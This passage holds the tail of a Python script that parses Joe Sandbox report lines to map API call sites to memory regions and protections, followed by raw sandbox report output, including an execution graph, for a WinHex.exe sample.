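    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{16}):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{16})")


@dataclass(frozen=True)
class Region:
    pid: int
    step: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))


@dataclass(frozen=True)
class ApiCall:
    func: str
    module: str
    ref: int
    subcall_of: Optional[int]  # address of the enclosing subcall, if the bullet was indented


@dataclass
class Entry:
    image_base: Optional[int]
    regions: List[Region]   # sorted by base address
    calls: List[ApiCall]


def parse_entry(text: str) -> Entry:
    """Collect regions and API call sites from one function entry's text."""
    regions, calls, image_base = set(), [], None
    for line in text.splitlines():
        m = SDMP_RE.search(line)
        if m:
            regions.add(Region(int(m["pid"], 16), int(m["step"], 16), int(m["base"], 16),
                               int(m["protect"], 16), int(m["mtype"], 16)))
            om = OFFSET_RE.search(line)      # only the 'Source File' line carries the PE base
            if om:
                image_base = int(om["off"], 16)
            continue
        a = API_RE.match(line)
        if a:
            calls.append(ApiCall(a["func"], a["module"], int(a["ref"], 16),
                                 int(a["sub"], 16) if a["sub"] else None))
    return Entry(image_base, sorted(regions, key=lambda r: r.base), calls)


def locate(addr: int, regions: List[Region]) -> Optional[Region]:
    """Region with the highest base <= addr (sizes are not in the report, so this is a bound)."""
    hit = None
    for r in regions:
        if r.base <= addr:
            hit = r
        else:
            break
    return hit


def call_sites(entry: Entry) -> List[dict]:
    """One row per call site: API, RVA from the PE base, and the containing region's protection."""
    rows = []
    for c in entry.calls:
        region = locate(c.ref, entry.regions)
        rows.append({"api": f"{c.module}!{c.func}", "ref": c.ref,
                     "rva": None if entry.image_base is None else c.ref - entry.image_base,
                     "region_base": region.base if region else None,
                     "protect": region.protect_name if region else "unknown",
                     "executable": bool(region and region.protect & 0xF0)})  # any PAGE_EXECUTE_* bit
    return rows


def api_histogram(entry: Entry) -> Dict[str, int]:
    return dict(Counter(f"{c.module}!{c.func}" for c in entry.calls))


# Sample assembled from lines on this page (two function entries merged); argument lists shortened.
SAMPLE = """\
APIs
• GetModuleFileNameW.KERNEL32(?,00007FF7C5BD3699), ref: 00007FF7C5BD3BD1
  • Part of subcall function 00007FF7C5BD2620: GetLastError.KERNEL32(00000000,00000000,00007FF7C5BD101D), ref: 00007FF7C5BD2654
  • Part of subcall function 00007FF7C5BD2620: MessageBoxW.USER32 ref: 00007FF7C5BD272C
• FlsGetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E), ref: 00007FF7C5BEA87F
• FlsSetValue.KERNEL32(?,?,?,00007FF7C5BE9A73,?,?,00000000,00007FF7C5BE9D0E), ref: 00007FF7C5BEA89E
Memory Dump Source
• Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
• Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
"""

if __name__ == "__main__":
    entry = parse_entry(SAMPLE)
    for row in call_sites(entry):
        print(f"{row['api']:<28} rva=0x{row['rva']:05X} {row['protect']} exec={row['executable']}")
    print(api_histogram(entry))
```

Every call site in the sample resolves into the 0x7FF7C5BD1000 region dumped as PAGE_EXECUTE_READ inside a MEM_IMAGE mapping, which is what you expect for compiler-generated CRT and bootloader code; a "ref:" that resolved into one of the PAGE_READWRITE regions would instead point at code running from a data section and would be worth a closer look.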
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastMessageModuleName
                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                        • API String ID: 2581892565-1977442011
                                                                                                                        • Opcode ID: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                        • Instruction ID: e2211c7af756732fbc9e44b6085f28cc2fa999b5bda940ed9b99e70141bfd18d
                                                                                                                        • Opcode Fuzzy Hash: fe87d08da65b513e87772ab3e16eb14927cda1b8744753a26f3e7d7b1799e4b8
                                                                                                                        • Instruction Fuzzy Hash: 12018F32B1C64380FA65BF24E8563B5DA51EF48FE4FD40131D94E8668AEE6FE144C720
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C5BE7E9E
  • Part of subcall function 00007FF7C5BE9E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E2E
  • Part of subcall function 00007FF7C5BE9E18: GetLastError.KERNEL32(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E38
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C5BDB105), ref: 00007FF7C5BE7EBC
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\AppData\WinHex.exe
• API String ID: 3580290477-571040004
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
Similarity
• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error detected
• API String ID: 1878133881-3513342764
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Fatal error detected
• API String ID: 1878133881-4025702859
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
                                                                                                                        Similarity
                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                        • Opcode ID: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                        • Instruction ID: 328887bfced7d6263a41d98d9a9c7161c61e027206c232b550c0b77a596dfb42
                                                                                                                        • Opcode Fuzzy Hash: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                                                                                        • Instruction Fuzzy Hash: 4201A761A1C60785FB32BF60946227EEBA0EF44F28FC81035D54D42696DF7EE544DA24

Execution Graph

Execution Coverage: 7.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 10.7%
Total number of Nodes: 1474
Total number of Limit Nodes: 43
                                                                                                                        execution_graph 40229 4e6650 40230 4e6664 40229->40230 40231 4e665d 40229->40231 40237 4e695a 40230->40237 40233 4f9d9c 6 API calls 40231->40233 40234 4e6676 40231->40234 40233->40234 40235 4f9d9c 6 API calls 40234->40235 40236 4e667d 40235->40236 40238 4e6980 40237->40238 40243 4e6971 40237->40243 40253 4e7be5 40238->40253 40240 4e6985 SetEvent 40241 4e6995 GetLastError 40240->40241 40242 4e69b0 40240->40242 40241->40243 40242->40243 40244 4e69d4 GetMessageW 40242->40244 40249 4f8ab5 186 API calls 40243->40249 40245 4e69be TranslateMessage DispatchMessageW 40244->40245 40246 4e69e6 DestroyWindow 40244->40246 40245->40244 40247 4e6a26 40246->40247 40248 4e69f3 GetLastError 40246->40248 40250 4f9d9c 6 API calls 40247->40250 40251 4e6a00 40248->40251 40249->40247 40252 4e6a2d 40250->40252 40251->40243 40252->40231 40254 4e7bf1 __EH_prolog3 40253->40254 40255 4f9c14 11 API calls 40254->40255 40256 4e7c08 40255->40256 40257 4e7c41 LoadImageW 40256->40257 40260 4e7c15 40256->40260 40258 4e7c5e GetLastError 40257->40258 40259 4e7c7a LoadCursorW RegisterClassW 40257->40259 40258->40260 40261 4e7d37 40259->40261 40262 4e7cc4 GetLastError 40259->40262 40266 4f8ab5 186 API calls 40260->40266 40267 4e7d6d CreateWindowExW 40261->40267 40285 4f8a19 186 API calls 40261->40285 40262->40261 40263 4e7cd1 GetLastError 40262->40263 40264 4e7ce1 40263->40264 40264->40261 40265 4e7ce5 40264->40265 40279 4f8ab5 186 API calls 40265->40279 40284 4e7c3c 40266->40284 40268 4e7d8f GetLastError 40267->40268 40269 4e7da6 ChangeWindowMessageFilterEx 40267->40269 40270 4e7d9c 40268->40270 40271 4e7dba GetLastError 40269->40271 40272 4e7dd1 SetTimer 40269->40272 40270->40269 40280 4e7dc7 40271->40280 40275 4e7df5 40272->40275 40276 4e7de8 GetLastError 40272->40276 40273 4e7d1d 40278 4f9d9c 6 API calls 40273->40278 40274 4e7d16 40303 4e7e94 190 API calls __EH_prolog3 40274->40303 
40294 4f8822 40275->40294 40276->40275 40281 4e7d24 40278->40281 40279->40284 40280->40272 40286 4e7d2f 40281->40286 40304 4f9b21 8 API calls 40281->40304 40284->40273 40284->40274 40288 4e7d6a 40285->40288 40286->40240 40288->40267 40290 4e7e2e GetLastError 40292 4e7e3b 40290->40292 40291 4e7e45 ShowWindow SetWindowLongW GetWindowLongW 40291->40284 40293 4e7e6d 40291->40293 40292->40291 40305 4f8bee 40294->40305 40297 4f885d 40300 4f9d9c 6 API calls 40297->40300 40301 4e7e09 UpdateWindow 40300->40301 40301->40290 40301->40291 40303->40273 40304->40286 40326 4fb4dc 40305->40326 40307 4f8bf9 40308 4f9d9c 6 API calls 40307->40308 40309 4f8832 40308->40309 40309->40297 40310 4fc640 40309->40310 40311 4fd0b5 11 API calls 40310->40311 40312 4fc664 40311->40312 40313 4fc66d 40312->40313 40314 4fc676 RegQueryValueExW 40312->40314 40315 4f9d9c 6 API calls 40313->40315 40314->40313 40316 4fc6bc 40315->40316 40317 4f8843 40316->40317 40318 4fc6c2 RegCloseKey 40316->40318 40317->40297 40319 4f8bb3 40317->40319 40318->40317 40320 4f9d9c 6 API calls 40319->40320 40321 4f8bc3 40320->40321 40348 4fb369 40321->40348 40323 4f8bd2 40324 4f9d9c 6 API calls 40323->40324 40325 4f8be6 40324->40325 40325->40297 40337 4fd21f 40326->40337 40328 4fb50c 40330 4f9d9c 6 API calls 40328->40330 40332 4fb55e 40330->40332 40331 4fb52f RegSetKeySecurity 40331->40328 40333 4fb56d 40332->40333 40334 4fb564 LocalFree 40332->40334 40335 4fb57c 40333->40335 40336 4fb573 RegCloseKey 40333->40336 40334->40333 40335->40307 40336->40335 40338 4fd25a GetCurrentProcess IsWow64Process 40337->40338 40339 4fd24a 40337->40339 40340 4fd26f GetLastError 40338->40340 40341 4fd287 RegCreateKeyExW 40338->40341 40339->40338 40343 4fd27c 40340->40343 40341->40343 40344 4f9d9c 6 API calls 40343->40344 40345 4fd2d8 40344->40345 40346 4fd2de RegCloseKey 40345->40346 40347 4fb503 40345->40347 40346->40347 40347->40328 40347->40331 40349 4fd0b5 11 API calls 40348->40349 40350 4fb38b 40349->40350 40351 4fb3bb 40350->40351 
40352 4f9d9c 6 API calls 40350->40352 40354 4f9d9c 6 API calls 40351->40354 40353 4fb398 RegSetValueExW 40352->40353 40353->40351 40355 4fb3d0 40354->40355 40356 4eee5d 2 API calls 40355->40356 40357 4fb3d8 40356->40357 40358 4fb3dd RegCloseKey 40357->40358 40359 4fb3e6 40357->40359 40358->40359 40359->40323 39971 53f60e 40030 5501e0 39971->40030 39976 53fbbf 39978 54ea60 4 API calls 39976->39978 39980 53fc0f 39978->39980 39982 53f76d GetLastError 39983 53f778 39982->39983 39983->39976 39984 53f7d3 39983->39984 40066 541dd1 15 API calls 39983->40066 39984->39976 39986 53f808 GetWindowsDirectoryA 39984->39986 40091 53ecc6 _vsnprintf 39984->40091 39989 53f81e 39986->39989 39987 53fba3 40067 5445c1 39987->40067 39992 4fe595 _vsnwprintf 39989->39992 39991 53f801 39991->39986 39991->39989 39993 53fa43 39992->39993 39994 4fe595 _vsnwprintf 39993->39994 40023 54007d 39993->40023 39996 53fa70 39994->39996 39997 4fe595 _vsnwprintf 39996->39997 39996->40023 39998 53fa9d 39997->39998 39999 4fe595 _vsnwprintf 39998->39999 39998->40023 40000 53faca 39999->40000 40001 4fe595 _vsnwprintf 40000->40001 40000->40023 40002 53faf7 40001->40002 40003 4fe595 _vsnwprintf 40002->40003 40002->40023 40004 53fb24 40003->40004 40005 4fe595 _vsnwprintf 40004->40005 40004->40023 40008 53fb51 40005->40008 40006 53fc74 40007 53fca7 40006->40007 40009 53fc91 SetUnhandledExceptionFilter 40006->40009 40079 53f5a0 40007->40079 40008->40006 40012 4fe595 _vsnwprintf 40008->40012 40013 53fb91 40008->40013 40008->40023 40009->40007 40011 53fc18 ExpandEnvironmentStringsW 40014 53fc46 GetTempPathW 40011->40014 40015 53fc29 GetFileAttributesW 40011->40015 40012->40013 40013->40006 40013->40011 40014->40006 40017 53fc52 wcsrchr 40014->40017 40015->40014 40016 53fc34 40015->40016 40016->40006 40016->40014 40017->40006 40019 53fcac 40020 53ff81 GetCurrentProcessId 40019->40020 40022 53ffac 40019->40022 40019->40023 40020->40022 40021 540044 40021->40023 40024 540071 RtlAddVectoredExceptionHandler 40021->40024 
40022->40021 40025 53fffe GetLastError 40022->40025 40085 5400cc 40023->40085 40024->40023 40026 4e1d02 23 API calls 40025->40026 40027 540037 40026->40027 40028 54086c 140 API calls 40027->40028 40028->40021 40031 53f632 8 API calls 40030->40031 40032 54290c 40031->40032 40033 54292e 40032->40033 40043 542ae3 40032->40043 40035 542949 GetVersion 40033->40035 40037 542965 40033->40037 40034 54ea60 4 API calls 40036 53f72e 40034->40036 40035->40037 40036->39976 40047 53ed7d 40036->40047 40038 5429e4 40037->40038 40039 542978 GetModuleHandleW 40037->40039 40041 542a2a memset ExpandEnvironmentStringsW 40038->40041 40040 5429cd GetProcAddress 40039->40040 40039->40041 40040->40041 40042 5429dd 40040->40042 40041->40043 40044 542aaa LoadLibraryExW 40041->40044 40042->40041 40043->40034 40045 542ad0 GetProcAddress 40044->40045 40046 542abd FreeLibrary 40044->40046 40045->40043 40046->40043 40092 501150 AllocateAndInitializeSid 40047->40092 40050 53eda7 40055 54ea60 4 API calls 40050->40055 40051 53edac AllocateAndInitializeSid 40051->40050 40052 53edc9 CheckTokenMembership 40051->40052 40053 53ede1 FreeSid 40052->40053 40054 53edde 40052->40054 40053->40050 40054->40053 40056 53edf7 40055->40056 40057 5427a0 40056->40057 40058 541f8c 35 API calls 40057->40058 40059 5427b4 CreateMutexW 40058->40059 40061 5427ee 40059->40061 40062 5427df 40059->40062 40064 542266 3 API calls 40061->40064 40062->40061 40063 5427e5 WaitForSingleObject 40062->40063 40063->40061 40065 53f761 40064->40065 40065->39982 40065->39983 40066->39987 40068 54290c 12 API calls 40067->40068 40069 5445ce 40068->40069 40070 5445d2 GetProcessHeap HeapAlloc 40069->40070 40071 54460b 40069->40071 40072 5445f1 40070->40072 40073 5445e8 40070->40073 40071->39984 40072->40071 40101 542f1b 40072->40101 40116 542d3b 20 API calls __EH_prolog3 40073->40116 40075 5445ef 40075->40072 40080 53f5ac 40079->40080 40081 53f5cd 40080->40081 40082 53f5bd TlsAlloc 40080->40082 40083 53f5d6 TlsAlloc 40081->40083 40084 53f5e6 
40081->40084 40082->40081 40082->40084 40083->40084 40084->40019 40086 5400d5 40085->40086 40088 5400e4 40085->40088 40086->40088 40151 540307 63 API calls 40086->40151 40148 5422c0 CloseHandle 40088->40148 40091->39991 40093 5011c2 GetLastError 40092->40093 40094 501195 CheckTokenMembership 40092->40094 40097 5011ca SetLastError 40093->40097 40095 5011aa 40094->40095 40096 5011af GetLastError 40094->40096 40098 5011b7 FreeSid 40095->40098 40096->40098 40099 54ea60 4 API calls 40097->40099 40098->40097 40100 5011df 40099->40100 40100->40050 40100->40051 40103 542f27 40101->40103 40102 543058 40102->40071 40117 544616 22 API calls 40102->40117 40103->40102 40115 5427a0 40 API calls 40103->40115 40104 542f53 40104->40102 40118 542e53 40104->40118 40106 542f70 40107 543046 40106->40107 40109 542f89 GetProcessHeap RtlAllocateHeap 40106->40109 40129 543062 14 API calls 40107->40129 40109->40107 40110 542fa8 memset 40109->40110 40111 542fc4 40110->40111 40111->40107 40112 54303a 40111->40112 40128 542c34 10 API calls __EH_prolog3 40112->40128 40114 543042 40114->40107 40115->40104 40116->40075 40117->40071 40119 542e5f __EH_prolog3 40118->40119 40120 545274 6 API calls 40119->40120 40124 542e97 40120->40124 40121 542f06 40136 541710 40121->40136 40123 542f11 40123->40106 40124->40121 40130 5451d5 40124->40130 40126 542ec3 40126->40121 40127 542ed3 memset 40126->40127 40127->40121 40128->40114 40129->40102 40131 5451e3 40130->40131 40139 542800 40131->40139 40133 545204 40133->40126 40137 541715 GetProcessHeap HeapFree 40136->40137 40138 541726 40136->40138 40137->40138 40138->40123 40140 541f8c 35 API calls 40139->40140 40141 542815 CreateFileMappingW 40140->40141 40143 542266 3 API calls 40141->40143 40144 54284d 40143->40144 40145 542851 40144->40145 40146 54285c GetLastError 40144->40146 40145->40133 40147 5422e0 MapViewOfFile 40145->40147 40146->40145 40147->40133 40149 5422d2 DebugBreak 40148->40149 40150 54010c 40148->40150 40149->40150 40150->39976 40151->40088 
40360 4e9210 40362 4e922a 40360->40362 40361 4e9250 40363 4e92a9 40361->40363 40366 4e9259 40361->40366 40362->40361 40365 4f8a19 186 API calls 40362->40365 40375 53e9a2 40363->40375 40365->40361 40367 4f8ab5 186 API calls 40366->40367 40371 4e9282 40367->40371 40368 4f9d9c 6 API calls 40369 4e93d4 40368->40369 40371->40368 40372 4f8a19 186 API calls 40374 4e92fe 40372->40374 40373 4f8a19 186 API calls 40373->40371 40374->40371 40374->40373 40376 4fb3ee 17 API calls 40375->40376 40377 53e9d2 40376->40377 40378 53ea38 40377->40378 40379 53e9df 40377->40379 40382 4f9d9c 6 API calls 40378->40382 40390 53ea52 13 API calls __EH_prolog3 40379->40390 40381 53e9e6 40383 53e9ec 40381->40383 40385 4fb3ee 17 API calls 40381->40385 40384 4e92b4 40382->40384 40383->40378 40384->40372 40384->40374 40386 53ea0b 40385->40386 40386->40378 40387 4f8bb3 15 API calls 40386->40387 40388 53ea1e 40387->40388 40388->40383 40391 53ea52 13 API calls __EH_prolog3 40388->40391 40390->40381 40391->40383 37448 4e7aca 37450 4e7b0e 37448->37450 37454 4e7ae7 37448->37454 37451 4e7b3d NtPowerInformation 37450->37451 37462 4f8a19 37450->37462 37472 4f9ca1 37451->37472 37453 4e7b5c 37453->37454 37459 4e7b85 37453->37459 37479 4f8ab5 37454->37479 37458 4e7b3a 37458->37451 37460 4f8a19 186 API calls 37459->37460 37461 4e7b09 37459->37461 37460->37461 37485 4f9d9c 37461->37485 37463 4f8a25 __EH_prolog3 37462->37463 37469 4f8a32 37463->37469 37493 4f95ca 37463->37493 37464 4f9d9c 6 API calls 37466 4f8aa2 37464->37466 37468 4f8aad 37466->37468 37535 4f9b21 8 API calls 37466->37535 37468->37458 37469->37464 37473 4f9cbb 37472->37473 37478 4f9cee 37472->37478 37474 4f9ccc GetModuleHandleExW 37473->37474 37473->37478 37475 4f9cf4 GetProcAddress 37474->37475 37476 4f9ce1 GetLastError 37474->37476 37475->37476 37477 4f9d08 37475->37477 37476->37478 37477->37478 37478->37453 37480 4f8ada 37479->37480 37481 4f8ac2 37479->37481 37482 4f9d9c 6 API calls 37480->37482 37481->37480 37483 4f8a19 186 API calls 
37481->37483 37484 4f8af1 37482->37484 37483->37480 37484->37461 37486 4f9dc8 37485->37486 37487 4f9e3d 37486->37487 37490 4f9e13 EtwEventEnabled 37486->37490 37488 54ea60 4 API calls 37487->37488 37489 4e7bdc 37488->37489 37490->37487 37491 4f9e19 EtwEventWrite 37490->37491 37491->37487 37536 4e1892 37493->37536 37496 4f9768 37497 4f977d 37496->37497 37498 4f9c14 11 API calls 37496->37498 37500 4f9d9c 6 API calls 37497->37500 37498->37497 37499 4f9d9c 6 API calls 37507 4f962b 37499->37507 37501 4f9791 37500->37501 37502 4f979c 37501->37502 37555 4f9b21 8 API calls 37501->37555 37504 4f97b0 37502->37504 37505 4f97a0 GetProcessHeap HeapFree 37502->37505 37540 54ea60 37504->37540 37505->37504 37507->37497 37507->37499 37509 4f96cf GetProcessHeap HeapAlloc 37507->37509 37510 4f96bd GetProcessHeap HeapFree 37507->37510 37508 4f8a60 37508->37469 37517 4e34a0 37508->37517 37511 4f96ea GetProcessHeap HeapFree 37509->37511 37513 4f96fa 37509->37513 37510->37509 37511->37513 37512 4e1892 _vsnwprintf 37512->37513 37513->37507 37513->37512 37514 4f9727 37513->37514 37516 4f9738 37513->37516 37514->37497 37545 4f9c14 37514->37545 37516->37497 37518 4e34bf 37517->37518 37520 4e34d0 37517->37520 37521 4f9d9c 6 API calls 37518->37521 37519 4e3520 GetLastError 37566 4e1d02 37519->37566 37520->37518 37520->37519 37523 4e3587 37521->37523 37525 4e3592 37523->37525 37604 4f9b21 8 API calls 37523->37604 37525->37469 37529 4e3566 37603 4f7def 26 API calls 37529->37603 37531 4e356f 37532 4e359d GetCurrentThreadId 37531->37532 37534 4e3575 37531->37534 37605 4e3685 23 API calls 37532->37605 37534->37518 37535->37468 37537 4e18a1 37536->37537 37538 4e18b1 _vsnwprintf 37537->37538 37539 4e18d0 37537->37539 37538->37539 37539->37496 37539->37507 37541 54ea68 37540->37541 37542 54ea6b 37540->37542 37541->37508 37556 54eb2c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37542->37556 37544 54ec62 37544->37508 37546 4f9c34 37545->37546 37547 4f9c25 
37545->37547 37565 4fbb2e 11 API calls 37546->37565 37557 4fcc6a 37547->37557 37551 4f9c49 37553 4f9d9c 6 API calls 37551->37553 37552 4f9c43 37552->37551 37554 4f9c57 37553->37554 37554->37516 37555->37502 37556->37544 37558 4fcc82 37557->37558 37559 4fcc88 37558->37559 37560 4f9d9c 6 API calls 37558->37560 37563 4f9d9c 6 API calls 37559->37563 37561 4fcc98 37560->37561 37562 4f9d9c 6 API calls 37561->37562 37562->37559 37564 4f9c2e 37563->37564 37564->37546 37564->37551 37565->37552 37606 540caa 37566->37606 37569 54086c GetLastError memset 37570 540b2b 37569->37570 37574 5408ff 37569->37574 37571 54ea60 4 API calls 37570->37571 37573 4e355d 37571->37573 37572 540965 37578 5409aa 37572->37578 37656 53edf9 VirtualQuery 37572->37656 37573->37518 37573->37529 37574->37570 37574->37572 37574->37574 37575 540922 GetProcessHeap HeapAlloc 37574->37575 37575->37572 37577 540946 37575->37577 37579 4fe595 _vsnwprintf 37577->37579 37581 540a44 TlsGetValue 37578->37581 37646 54056f 37578->37646 37580 540957 37579->37580 37580->37572 37584 540a54 37581->37584 37583 540978 37583->37578 37588 540997 wcsrchr 37583->37588 37650 5403b6 GetLocalTime SystemTimeToVariantTime 37584->37650 37588->37578 37590 540a23 37658 544bae 25 API calls 37590->37658 37594 540a34 GetProcessHeap HeapFree 37594->37581 37595 540af3 37597 540b05 37595->37597 37598 540af8 37595->37598 37596 540ae3 GetProcessHeap HeapFree 37596->37595 37600 540b0c RaiseException 37597->37600 37601 540b1d SetLastError 37597->37601 37659 540307 63 API calls 37598->37659 37600->37601 37601->37570 37602 540afd ExitProcess 37603->37531 37604->37525 37605->37534 37607 4e1d16 37606->37607 37608 540cce GetLastError 37606->37608 37607->37569 37625 540b44 37608->37625 37611 540dcf SetLastError 37611->37607 37612 540dc6 37612->37611 37613 540d06 FormatMessageW 37614 540d2e 37613->37614 37615 540d8f 37614->37615 37616 540d48 GetProcessHeap HeapAlloc 37614->37616 37617 4e1892 _vsnwprintf 37615->37617 37618 540d68 37616->37618 37623 
540d78 37616->37623 37619 540da1 37617->37619 37641 4fe595 37618->37641 37621 540db5 37619->37621 37622 540da5 GetProcessHeap HeapFree 37619->37622 37621->37611 37624 540dbb LocalFree 37621->37624 37622->37621 37623->37615 37624->37611 37645 54f2f8 37625->37645 37627 540b50 TlsGetValue 37628 540b70 EnterCriticalSection 37627->37628 37629 540c9a 37627->37629 37630 540b86 GetProcessHeap HeapAlloc 37628->37630 37631 540bb7 37628->37631 37629->37611 37629->37612 37629->37613 37629->37614 37632 540ba3 37630->37632 37636 540c39 37630->37636 37633 540bc6 GetProcessHeap HeapReAlloc 37631->37633 37634 540bf7 GetProcessHeap RtlAllocateHeap 37631->37634 37632->37634 37633->37636 37637 540be6 37633->37637 37635 540c1b TlsSetValue 37634->37635 37634->37636 37635->37636 37638 540c6f TlsSetValue GetProcessHeap HeapFree 37636->37638 37639 540c4f 37636->37639 37637->37634 37640 540c8d LeaveCriticalSection 37638->37640 37639->37640 37640->37629 37642 4fe5a4 37641->37642 37643 4fe5b4 _vsnwprintf 37642->37643 37644 4fe5d4 37642->37644 37643->37644 37644->37623 37645->37627 37647 540578 37646->37647 37648 54057d 37646->37648 37660 5404a9 memset RegOpenKeyExW 37647->37660 37648->37581 37657 540801 29 API calls 37648->37657 37651 5403f3 37650->37651 37652 54ea60 4 API calls 37651->37652 37653 540405 GetCurrentThreadId 37652->37653 37654 540de1 TlsGetValue 37653->37654 37655 540ab9 37654->37655 37655->37595 37655->37596 37656->37583 37657->37590 37658->37594 37659->37602 37661 540505 RegQueryValueExW 37660->37661 37662 54053b GetEnvironmentVariableW 37660->37662 37663 54052a 37661->37663 37664 54052b RegCloseKey 37661->37664 37665 540556 37662->37665 37666 540561 37662->37666 37663->37664 37664->37662 37664->37665 37670 540407 wcsrchr towlower towlower 37665->37670 37668 54ea60 4 API calls 37666->37668 37669 54056d 37668->37669 37669->37648 37670->37666 40152 4f8cd1 40153 4f8cef 40152->40153 40154 4f8ebc 40153->40154 40157 4f9d9c 6 API calls 40153->40157 40155 4f9d9c 6 API calls 
40154->40155 40156 4f8ecc 40155->40156 40158 54ea60 4 API calls 40156->40158 40163 4f8d5a 40157->40163 40159 4f8edb 40158->40159 40160 4f8ee6 40169 54ec64 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 40160->40169 40161 4f8dab wcschr 40161->40163 40163->40154 40163->40160 40163->40161 40165 4f8e41 GetFileAttributesW 40163->40165 40166 4f8e57 CreateDirectoryW 40163->40166 40164 4f8eeb 40165->40163 40165->40166 40167 4f8eaf GetLastError 40166->40167 40168 4f8e6a GetFileAttributesW 40166->40168 40167->40154 40168->40163 40168->40167 40169->40164 37699 4ed2e0 37700 4ed2f1 37699->37700 37701 4ed3aa 37700->37701 37702 4f8ab5 186 API calls 37700->37702 37703 4f9d9c 6 API calls 37701->37703 37702->37701 37704 4ed3b1 37703->37704 37671 545a90 37673 545ab3 37671->37673 37675 545b3b 37671->37675 37672 54ea60 4 API calls 37674 545b52 37672->37674 37673->37675 37677 542b70 37673->37677 37675->37672 37682 545274 37677->37682 37680 542b90 37680->37675 37681 545274 6 API calls 37681->37680 37683 5452b0 37682->37683 37684 545283 GetProcessHeap RtlAllocateHeap 37682->37684 37686 5452b8 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 37683->37686 37687 542b83 37683->37687 37684->37687 37688 5452df 